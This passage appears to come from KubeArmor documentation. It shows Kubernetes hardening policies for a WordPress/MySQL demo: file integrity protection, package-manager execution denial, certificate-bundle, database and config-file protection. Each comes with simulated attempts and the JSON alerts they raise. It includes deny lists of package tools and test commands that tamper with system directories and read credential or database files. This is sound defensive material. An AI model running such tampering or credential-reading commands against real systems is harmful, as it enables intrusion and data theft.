  "Severity": "",
  "Source": "/bin/ls",
  "Tags": "",
  "Timestamp": 1695903189,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-09-28T12:13:09.159252Z",
  "cluster_id": "3664",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

FIM: File Integrity Monitoring/Protection

Description

System binary folders, configuration paths, and credential paths need to be monitored for changes. With KubeArmor, one can not only monitor changes but also block any write attempts in such system folders. Compliance frameworks such as PCI-DSS, NIST, and CIS expect FIM to be in place.

Attack Scenario

In a possible attack scenario, an attacker may try to update the configuration to disable security controls or access logs. This can allow them to gain further access to the system and carry out malicious activities undetected. It's crucial to be aware of such threats and take proactive measures to prevent such attacks from occurring.

Attack Type: Data Manipulation, Integrity Threats
Actual Attack: NetWalker, Conti, DarkSide RaaS

Compliance

  • CIS Distribution Independent Linux v2.0, Control-Id: 6.3.5

  • PCI-DSS, Requirement: 6

  • PCI-DSS, Requirement: 10

  • NIST_800-53_AU-2

  • MITRE_T1565_data_manipulation

Policy

File Integrity Monitoring

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-file-integrity-monitoring
  namespace: wordpress-mysql
spec:
  action: Block
  file:
    matchDirectories:
    - dir: /sbin/
      readOnly: true
      recursive: true
    - dir: /usr/bin/
      readOnly: true
      recursive: true
    - dir: /usr/lib/
      readOnly: true
      recursive: true
    - dir: /usr/sbin/
      readOnly: true
      recursive: true
    - dir: /bin/
      readOnly: true
      recursive: true
    - dir: /boot/
      readOnly: true
      recursive: true
  message: Detected and prevented compromise to File integrity
  selector:
    matchLabels:
      app: mysql
  severity: 1
  tags:
  - NIST
  - NIST_800-53_AU-2
  - NIST_800-53_SI-4
  - MITRE
  - MITRE_T1036_masquerading
  - MITRE_T1565_data_manipulation

Simulation

kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# cd sbin
root@mysql-74775b4bf4-65nqf:/sbin# touch file
touch: cannot touch 'file': Permission denied
root@mysql-74775b4bf4-65nqf:/sbin# cd ..

Expected Alert

{
  "ATags": [
    "NIST",
    "NIST_800-53_AU-2",
    "NIST_800-53_SI-4",
    "MITRE",
    "MITRE_T1036_masquerading",
    "MITRE_T1565_data_manipulation"
  ],
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_OPEN flags=O_WRONLY|O_CREAT|O_NOCTTY|O_NONBLOCK",
  "Enforcer": "AppArmor",
  "HashID": "f0b220bfa3b7aeae754f3bf8a60dd1a0af001f5956ad22f625bdf83406a7fea3",
  "HostName": "aditya",
  "HostPID": 16462,
  "HostPPID": 16435,
  "Labels": "app=mysql",
  "Message": "Detected and prevented compromise to File integrity",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 167,
  "PPID": 160,
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "harden-mysql-file-integrity-monitoring",
  "ProcessName": "/bin/touch",
  "Resource": "/sbin/file",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/usr/bin/touch file",
  "Tags": "NIST,NIST_800-53_AU-2,NIST_800-53_SI-4,MITRE,MITRE_T1036_masquerading,MITRE_T1565_data_manipulation",
  "Timestamp": 1696316210,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T06:56:50.829165Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

Packaging tools: Deny execution of package management tools

Description

Pods/containers might get shipped with binaries which should never be used in production environments. Some of those binaries might be useful in dev/staging environments, but the same container image is usually carried forward to production too. For security reasons, the DevSecOps team might want to disable the use of these binaries in production even though they exist in the container. As an example, most container images are shipped with package management tools such as apk, apt, yum, etc. If anyone ends up using these in the production environment, it will increase the attack surface of the container/pod.

Attack Scenario

In an attack scenario, adversaries may use system tools such as fsck, ip, who, apt, and others for reconnaissance and to download additional tooling from remote servers. These tools can help them gain valuable information about the system and its vulnerabilities, allowing them to carry out further attacks. It's important to be vigilant about such activities and implement security measures to prevent such attacks from happening.

Attack Type: Command Injection, Malware, Backdoor
Actual Attack: AppleJeus, Codecov supply chain

Compliance

  • CIS Distribution Independent Linux v2.0

  • Control-Id: 6.4.5

  • NIST_800-53_SI-4

  • NIST_800-53_CM-7(4)

Policy

Packaging tools execution

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-pkg-mngr-exec
  namespace: wordpress-mysql
spec:
  action: Block
  message: Alert! Execution of package management process inside container is denied
  process:
    matchPaths:
    - path: /usr/bin/apt
    - path: /usr/bin/apt-get
    - path: /bin/apt-get
    - path: /sbin/apk
    - path: /bin/apt
    - path: /usr/bin/dpkg
    - path: /bin/dpkg
    - path: /usr/bin/gdebi
    - path: /bin/gdebi
    - path: /usr/bin/make
    - path: /bin/make
    - path: /usr/bin/yum
    - path: /bin/yum
    - path: /usr/bin/rpm
    - path: /bin/rpm
    - path: /usr/bin/dnf
    - path: /bin/dnf
    - path: /usr/bin/pacman
    - path: /usr/sbin/pacman
    - path: /bin/pacman
    - path: /sbin/pacman
    - path: /usr/bin/makepkg
    - path: /usr/sbin/makepkg
    - path: /bin/makepkg
    - path: /sbin/makepkg
    - path: /usr/bin/yaourt
    - path: /usr/sbin/yaourt
    - path: /bin/yaourt
    - path: /sbin/yaourt
    - path: /usr/bin/zypper
    - path: /bin/zypper
  selector:
    matchLabels:
      app: mysql
  severity: 5
  tags:
  - NIST
  - NIST_800-53_CM-7(4)
  - SI-4
  - process
  - NIST_800-53_SI-4

Simulation

kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# apt
bash: /usr/bin/apt: Permission denied
root@mysql-74775b4bf4-65nqf:/# apt-get
bash: /usr/bin/apt-get: Permission denied

Expected Alert

{
  "ATags": [
    "NIST",
    "NIST_800-53_CM-7(4)",
    "SI-4",
    "process",
    "NIST_800-53_SI-4"
  ],
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HashID": "dd573c234f68b8df005e8cd314809c8b2a23852230d397743e348bf4a03ada3f",
  "HostName": "aditya",
  "HostPID": 21894,
  "HostPPID": 16435,
  "Labels": "app=mysql",
  "Message": "Alert! Execution of package management process inside container is denied",
  "NamespaceName": "wordpress-mysql",
  "Operation": "Process",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 168,
  "PPID": 160,
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "harden-mysql-pkg-mngr-exec",
  "ProcessName": "/usr/bin/apt",
  "Resource": "/usr/bin/apt",
  "Result": "Permission denied",
  "Severity": "5",
  "Source": "/bin/bash",
  "Tags": "NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4",
  "Timestamp": 1696318864,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T07:41:04.096412Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

Trusted certs bundle: Protect write access to the trusted root certificates bundle

Description

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.

Attack Scenario

By using this technique, attackers can successfully evade security warnings that alert users when compromised systems connect over HTTPS to adversary-controlled web servers. These servers often look like legitimate websites, and are designed to trick users into entering their login credentials, which can then be used by the attackers. It's important to be aware of this threat and take necessary precautions to prevent these attacks from happening.

Attack Type: Man-In-The-Middle (MITM)
Actual Attack: POODLE (Padding Oracle On Downgraded Legacy Encryption), BEAST (Browser Exploit Against SSL/TLS)

Compliance

  • CIS Distribution Independent Linux v2.0

  • Control-Id: 6.3.4

  • MITRE_T1552_unsecured_credentials

Policy

Trusted Certs Bundle

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-trusted-cert-mod
  namespace: wordpress-mysql
spec:
  action: Block
  file:
    matchDirectories:
    - dir: /etc/ssl/
      readOnly: true
      recursive: true
    - dir: /etc/pki/
      readOnly: true
      recursive: true
    - dir: /usr/local/share/ca-certificates/
      readOnly: true
      recursive: true
  message: Credentials modification denied
  selector:
    matchLabels:
      app: mysql
  severity: 1
  tags:
  - MITRE
  - MITRE_T1552_unsecured_credentials
  - FGT1555
  - FIGHT

Simulation

 kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# cd /etc/ssl/
root@mysql-74775b4bf4-65nqf:/etc/ssl# ls
certs
root@mysql-74775b4bf4-65nqf:/etc/ssl# rmdir certs
rmdir: failed to remove 'certs': Permission denied
root@mysql-74775b4bf4-65nqf:/etc/ssl# cd certs/
root@mysql-74775b4bf4-65nqf:/etc/ssl/certs# touch new
touch: cannot touch 'new': Permission denied
root@mysql-74775b4bf4-65nqf:/etc/ssl/certs#

Expected Alert

{
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_RMDIR",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 24462,
  "HostPPID": 24411,
  "Labels": "app=mysql",
  "Message": "Credentials modification denied",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 185,
  "PPID": 179,
  "ParentProcessName": "/bin/bash",
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "harden-mysql-trusted-cert-mod",
  "ProcessName": "/bin/rmdir",
  "Resource": "/etc/ssl/certs",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/bin/rmdir certs",
  "Tags": "MITRE,MITRE_T1552_unsecured_credentials,FGT1555,FIGHT",
  "Timestamp": 1696320102,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-03T08:01:42.373810Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References


Database access: Protect read/write access to raw database tables from unknown processes.

Description

Applications use databases to store information such as posts, blogs, and user data. WordPress applications almost certainly use a MySQL database for storing their content, which usually lives elsewhere on the system, often under /var/lib/mysql/some_db_name.

Attack Scenario

Adversaries have been known to use various techniques to steal information from databases. This information can include user credentials, posts, blogs, and more. By obtaining it, adversaries can gain access to user accounts and potentially perform a full account takeover, leading to further compromise of the target system. It's important to ensure that appropriate security measures are in place to protect against these types of attacks. Attack Type: SQL Injection, Credential Access, Account Takeover. Actual Attack: Yahoo Voices Data Breach in 2012.

Compliance

  • CIS Distribution Independent Linux v2.0

  • Control-Id: 6.14.4

Policy

Database Access

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-mysql-dir
  namespace: wordpress-mysql
spec:
  message: Alert! Attempt to make changes to database detected
  tags:
  - CIS
  - CIS_Linux
  selector:
    matchLabels:
      app: mysql
  file:
    matchDirectories:
    - dir: /var/lib/mysql/
      ownerOnly: true
      readOnly: true
  severity: 1
  action: Block

Simulation

kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# cd var/lib/mysql
root@mysql-74775b4bf4-65nqf:/var/lib/mysql# cat ib_logfile1
cat: ib_logfile1: Permission denied
root@mysql-74775b4bf4-65nqf:/var/lib/mysql#

Expected Alert

{
  "ATags": [
    "CIS",
    "CIS_Linux"
  ],
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_OPEN flags=O_RDONLY",
  "Enforcer": "AppArmor",
  "HashID": "a7b7d91d52de395fe6cda698e89e0112e6f3ab818ea331cee60295a8ede358c8",
  "HostName": "aditya",
  "HostPID": 29898,
  "HostPPID": 29752,
  "Labels": "app=mysql",
  "Message": "Alert! Attempt to make changes to database detected",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 230,
  "PPID": 223,
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "ksp-block-mysql-dir",
  "ProcessName": "/bin/cat",
  "Resource": "/var/lib/mysql/ib_logfile1",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/bin/cat ib_logfile1",
  "Tags": "CIS,CIS_Linux",
  "Timestamp": 1696322555,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T08:42:35.618890Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

References

Config data: Protect access to configuration data containing plain text credentials.

Description

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

Attack Scenario

In a possible attack scenario, an attacker may try to change the configuration to open websites up to application security holes such as session hijacking and cross-site scripting attacks, which can lead to the disclosure of private data. Additionally, attackers can leverage these changes to gather sensitive information. It's crucial to take proactive measures to prevent these attacks. Attack Type: Cross-Site Scripting (XSS), Data Manipulation, Session Hijacking. Actual Attack: XSS attack on Fortnite 2019, Turla LightNeuron Attack.

Compliance

  • CIS Distribution Independent Linux v2.0

  • Control-Id: 6.16.14

Policy

Config data

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-stig-v-81883-restrict-access-to-config-files
  namespace: wordpress-mysql
spec:
  tags:
  - config-files
  message: Alert! configuration files have been accessed
  selector:
    matchLabels:
      app: wordpress
  file:
    matchPatterns:
    - pattern: /**/*.conf
      ownerOnly: true
  action: Block

Simulation

With a shell different than the user owning the file:

$ cat /etc/ca-certificates.conf                                                                                         
cat: /etc/ca-certificates.conf: Permission denied                                                                       
$                                                   

Expected Alert

{
  "Action": "Block",
  "ClusterName": "d3mo",
  "ContainerID": "548176888fca6bb6d66633794f3d5f9d54930a9d9f43d4f05c11de821c758c0f",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_OPEN flags=O_RDONLY",
  "Enforcer": "AppArmor",
  "HostName": "master-node",
  "HostPID": 39039,
  "HostPPID": 38787,
  "Labels": "app=wordpress",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "wordpress",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 220,
  "PPID": 219,
  "ParentProcessName": "/bin/dash",
  "PodName": "wordpress-fb448db97-wj7n7",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/bin/cat",
  "Resource": "/etc/ca-certificates.conf",
  "Result": "Permission denied",
  "Source": "/bin/cat /etc/ca-certificates.conf",
  "Timestamp": 1696485467,
  "Type": "MatchedPolicy",
  "UID": 1000,
  "UpdatedTime": "2023-10-05T05:57:47.935622Z",
  "cluster_id": "2302",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References

KubeArmor supports a configurable default security posture. The posture can be allow, audit, or deny. The default posture is applied when there is at least one Allow policy for a given deployment, i.e., when KubeArmor is handling policies in a whitelisting manner (more on this under the policy action discussion below).
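The default posture can also be tuned per namespace. A minimal sketch, assuming the standard KubeArmor posture annotations (kubearmor-file-posture, kubearmor-network-posture) are supported by your KubeArmor version:

kubectl annotate ns wordpress-mysql kubearmor-file-posture=block --overwrite
kubectl annotate ns wordpress-mysql kubearmor-network-posture=audit --overwrite

With these annotations, file operations outside the allowed set would be blocked, while network operations outside the allowed set would only be audited.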

Note: This example is in the environment.

If you don't have access to a K8s cluster, please follow to set one up.

karmor CLI tool:

To deploy app follow

Ref:
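Once KubeArmor and the sample app are running, the logs and alerts shown below can be streamed with the karmor CLI. A minimal sketch, assuming the logs subcommand and flags available in recent karmor versions:

karmor logs --json               # stream policy-match alerts as JSON
karmor logs --logFilter all      # stream both telemetry logs and alerts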


For better understanding, you can check .

In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. With matchPatterns, advanced users can specify particular patterns for executables using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor, so we generally do not recommend using this match.
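For illustration only, a hedged sketch of a matchPatterns rule; the exact pattern syntax ultimately depends on the enforcer (an AppArmor-style glob is shown here), so treat this as an assumption to verify in your environment:

  process:
    matchPatterns:
    - pattern: /tmp/**    # matches any executable under /tmp (AppArmor-style glob)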

In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check the available capability names in the Linux capability list (capabilities(7)).
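As a quick illustration (a full, working example appears later in this document), a capabilities rule looks like this:

  capabilities:
    matchCapabilities:
    - capability: net_raw    # raw sockets; blocking this denies ping's ICMP packets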

The action could be Allow, Audit, or Block. Security policies are handled in a blacklist manner or a whitelist manner according to the action, so you need to define the action carefully (see the policy action discussion below for more details). The Audit action can be used for policy verification before applying a security policy with the Block action. For system call monitoring, we only support audit mode no matter what the action is set to.
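A common workflow, therefore, is to ship a rule with action: Audit first, watch the resulting alerts, and only then switch it to Block. A minimal sketch with a hypothetical policy name:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: audit-before-block-apt    # hypothetical name
  namespace: wordpress-mysql
spec:
  selector:
    matchLabels:
      app: mysql
  process:
    matchPaths:
    - path: /usr/bin/apt
  action: Audit                   # flip to Block once the alerts look right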

MITRE T1528: Steal Application Access Token
Mitre-Techniques-T1565
PCI DSS and FIM
The biggest ransomware attacks in history
MITRE Installer Packages
Codecov Incident - A Supply Chain Attack
MITRE Subvert Trust Controls
MITRE Unsecured credentials
POODLE Attack
BEAST
MITRE Scan Databases
Yahoo Service Hacked
MITRE Unsecured credentials in files
Turla LightNeuron
MITRE Exfiltration
Darkbeams data breach
Shields Healthcare Group Data Breach
STIG no exec in /tmp
The biggest ransomeware attacks in history
Shields Healthcare Group Data Breach
MITRE ATT&CK execution in k8s
Target Data Breach
MITRE Network Service Discovery
MITRE Indicator Removal
MITRE Network Service Discovery
Considerations in Policy Action
multiubuntu
wordpress-mysql
this
Adversarial Attacks on Deep Learning Models
How to Protect ML Models Against Adversarial Attacks
Weaponizing ML Models with Ransomware
https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/#Pickle-Code-Injection-POC
this
Download and install karmor-cli

Log fields:

  • ClusterName: the cluster for which the log was generated. Example: default
  • Operation: the type of operation that happened in the pod. Example: File/Process/Network
  • ContainerID: the ID of the container from which the log was generated. Example: 7aca8d52d35ab7872df6a454ca32339386be
  • ContainerImage: the image that was used to spin up the container. Example: docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea
  • ContainerName: the container name where the log got generated. Example: discovery-engine
  • Data: the system call that was invoked for this operation. Example: syscall=SYS_OPENAT fd=-100 flags=O_RDWR|O_CREAT|O_NOFOLLOW|O_CLOEXEC
  • HostName: the node name where the log got generated. Example: aks-agentpool-16128849-vmss000001
  • HostPID: the host process ID. Example: 967872
  • HostPPID: the host parent process ID. Example: 967496
  • Labels: the pod labels from which the log was generated. Example: app=discovery-engine
  • Message: the message specified in the policy. Example: Alert! Execution of package management process inside container is denied
  • NamespaceName: the namespace where the pod is running. Example: accuknox-agents
  • PID: the process ID running in the container. Example: 1
  • PPID: the parent process ID running in the container. Example: 967496
  • ParentProcessName: the parent process name from which the operation happened. Example: /usr/bin/containerd-shim-runc-v2
  • PodName: the pod name where the log got generated. Example: mysql-76ddc6ddc4-h47hv
  • ProcessName: the process that performed the operation inside the pod. Example: /knoxAutoPolicy
  • Resource: the resource that was requested. Example: //accuknox-obs.db
  • Result: whether the event was allowed or denied. Example: Passed
  • Source: the source from which the operation request came. Example: /knoxAutoPolicy
  • Type: specifies it as a container log. Example: ContainerLog

{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000000",
  "NamespaceName": "default",
  "PodName": "vault-0",
  "Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
  "ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
  "ContainerName": "vault",
  "ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
  "ParentProcessName": "/usr/bin/runc",
  "ProcessName": "/bin/sh",
  "HostPPID": 2514065,
  "HostPID": 2514068,
  "PPID": 2514065,
  "PID": 3552620,
  "UID": 100,
  "Type": "ContainerLog",
  "Source": "/usr/bin/runc",
  "Operation": "Process",
  "Resource": "/bin/sh -ec vault status -tls-skip-verify",
  "Data": "syscall=SYS_EXECVE",
  "Result": "Passed"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000000",
  "NamespaceName": "accuknox-agents",
  "PodName": "discovery-engine-6f5c4df7b4-q8zbc",
  "Labels": "app=discovery-engine",
  "ContainerID": "7aca8d52d35ab7872df6a454ca32339386be755d9ed6bd6bf7b37ec6aaf277e4",
  "ContainerName": "discovery-engine",
  "ContainerImage": "docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea99741c3692e34b0f089b0e74745413",
  "ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/knoxAutoPolicy",
  "HostPPID": 967496,
  "HostPID": 967872,
  "PPID": 967496,
  "PID": 1,
  "Type": "ContainerLog",
  "Source": "/knoxAutoPolicy",
  "Operation": "File",
  "Resource": "/var/run/secrets/kubernetes.io/serviceaccount/token",
  "Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC",
  "Result": "Passed"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000001",
  "NamespaceName": "accuknox-agents",
  "PodName": "policy-enforcement-agent-7946b64dfb-f4lgv",
  "Labels": "app=policy-enforcement-agent",
  "ContainerID": "b597629c9b59304c779c51839e9a590fa96871bdfdf55bfec73b26c9fb7647d7",
  "ContainerName": "policy-enforcement-agent",
  "ContainerImage": "public.ecr.aws/k9v9d5v2/policy-enforcement-agent:v0.1.0@sha256:005c1fde3ff8a667f3ac7540c5c011c752a7e3aaa2c89aa335703289ed8d80f8",
  "ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/home/pea/main",
  "HostPPID": 1394403,
  "HostPID": 1394554,
  "PPID": 1394403,
  "PID": 1,
  "Type": "ContainerLog",
  "Source": "./main",
  "Operation": "Network",
  "Resource": "sa_family=AF_INET sin_port=53 sin_addr=10.0.0.10",
  "Data": "syscall=SYS_CONNECT fd=10",
  "Result": "Passed"
}

Alert fields:

  • Action: the action of the policy that was matched. Example: Audit/Block
  • ClusterName: the cluster for which the alert was generated. Example: aks-test-cluster
  • Operation: the type of operation that happened in the pod. Example: File/Process/Network
  • ContainerID: the ID of the container where the policy violation or alert got generated. Example: e10d5edb62ac2daa4eb9a2146e2f2cfa87b6a5f30bd3a
  • ContainerImage: the image that was used to spin up the container. Example: docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f
  • ContainerName: the container name where the alert got generated. Example: mysql
  • Data: the system call that was invoked for this operation. Example: syscall=SYS_EXECVE
  • Enforcer: the name of the LSM that enforced the policy. Example: AppArmor/BPFLSM
  • HostName: the node name where the alert got generated. Example: aks-agentpool-16128849-vmss000001
  • HostPID: the host process ID. Example: 3647533
  • HostPPID: the host parent process ID. Example: 3642706
  • Labels: the pod labels from which the alert was generated. Example: app=mysql
  • Message: the message specified in the policy. Example: Alert! Execution of package management process inside container is denied
  • NamespaceName: the namespace where the pod is running. Example: wordpress-mysql
  • PID: the process ID running in the container. Example: 266
  • PPID: the parent process ID running in the container. Example: 251
  • ParentProcessName: the parent process name from which the operation happened. Example: /bin/bash
  • PodName: the pod name where the alert got generated. Example: mysql-76ddc6ddc4-h47hv
  • PolicyName: the policy that was matched for this alert. Example: harden-mysql-pkg-mngr-exec
  • ProcessName: the process that triggered the alert inside the pod. Example: /usr/bin/apt
  • Resource: the resource that was requested. Example: /usr/bin/apt
  • Result: whether the event was allowed or denied. Example: Permission denied
  • Severity: the severity level of the operation. Example: 5
  • Source: the source from which the operation request came. Example: /bin/bash
  • Tags: the list of benchmarks this policy satisfies. Example: NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4
  • Timestamp: the time at which the event was attempted. Example: 1687868507
  • Type: whether this is a matched policy or a default posture alert. Example: MatchedPolicy
  • UpdatedTime: the time of this alert. Example: 2023-06-27T12:21:47.932526
  • cluster_id: the cluster ID where the alert was generated. Example: 596
  • component_name: the component which generated this log/alert. Example: kubearmor
  • tenant_id: the tenant ID where this cluster is onboarded in AccuKnox SaaS. Example: 11

{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000001",
  "NamespaceName": "wordpress-mysql",
  "PodName": "wordpress-787f45786f-2q9wf",
  "Labels": "app=wordpress",
  "ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
  "ContainerName": "wordpress",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "HostPPID": 495804,
  "HostPID": 495877,
  "PPID": 309835,
  "PID": 309841,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/usr/bin/apt",
  "PolicyName": "harden-wordpress-pkg-mngr-exec",
  "Severity": "5",
  "Tags": "NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4",
  "ATags": [
    "NIST",
    "NIST_800-53_CM-7(4)",
    "SI-4",
    "process",
    "NIST_800-53_SI-4"
  ],
  "Message": "Alert! Execution of package management process inside container is denied",
  "Type": "MatchedPolicy",
  "Source": "/bin/bash",
  "Operation": "Process",
  "Resource": "/usr/bin/apt",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "Action": "Block",
  "Result": "Permission denied"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000001",
  "NamespaceName": "wordpress-mysql",
  "PodName": "wordpress-787f45786f-2q9wf",
  "Labels": "app=wordpress",
  "ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
  "ContainerName": "wordpress",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "HostPPID": 495804,
  "HostPID": 496390,
  "PPID": 309835,
  "PID": 309842,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/bin/rm",
  "PolicyName": "harden-wordpress-file-integrity-monitoring",
  "Severity": "1",
  "Tags": "NIST,NIST_800-53_AU-2,NIST_800-53_SI-4,MITRE,MITRE_T1036_masquerading,MITRE_T1565_data_manipulation",
  "ATags": [
    "NIST",
    "NIST_800-53_AU-2",
    "NIST_800-53_SI-4",
    "MITRE",
    "MITRE_T1036_masquerading",
    "MITRE_T1565_data_manipulation"
  ],
  "Message": "Detected and prevented compromise to File integrity",
  "Type": "MatchedPolicy",
  "Source": "/bin/rm /sbin/raw",
  "Operation": "File",
  "Resource": "/sbin/raw",
  "Data": "syscall=SYS_UNLINKAT flags=",
  "Enforcer": "AppArmor",
  "Action": "Block",
  "Result": "Permission denied"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000000",
  "NamespaceName": "default",
  "PodName": "vault-0",
  "Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
  "ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
  "ContainerName": "vault",
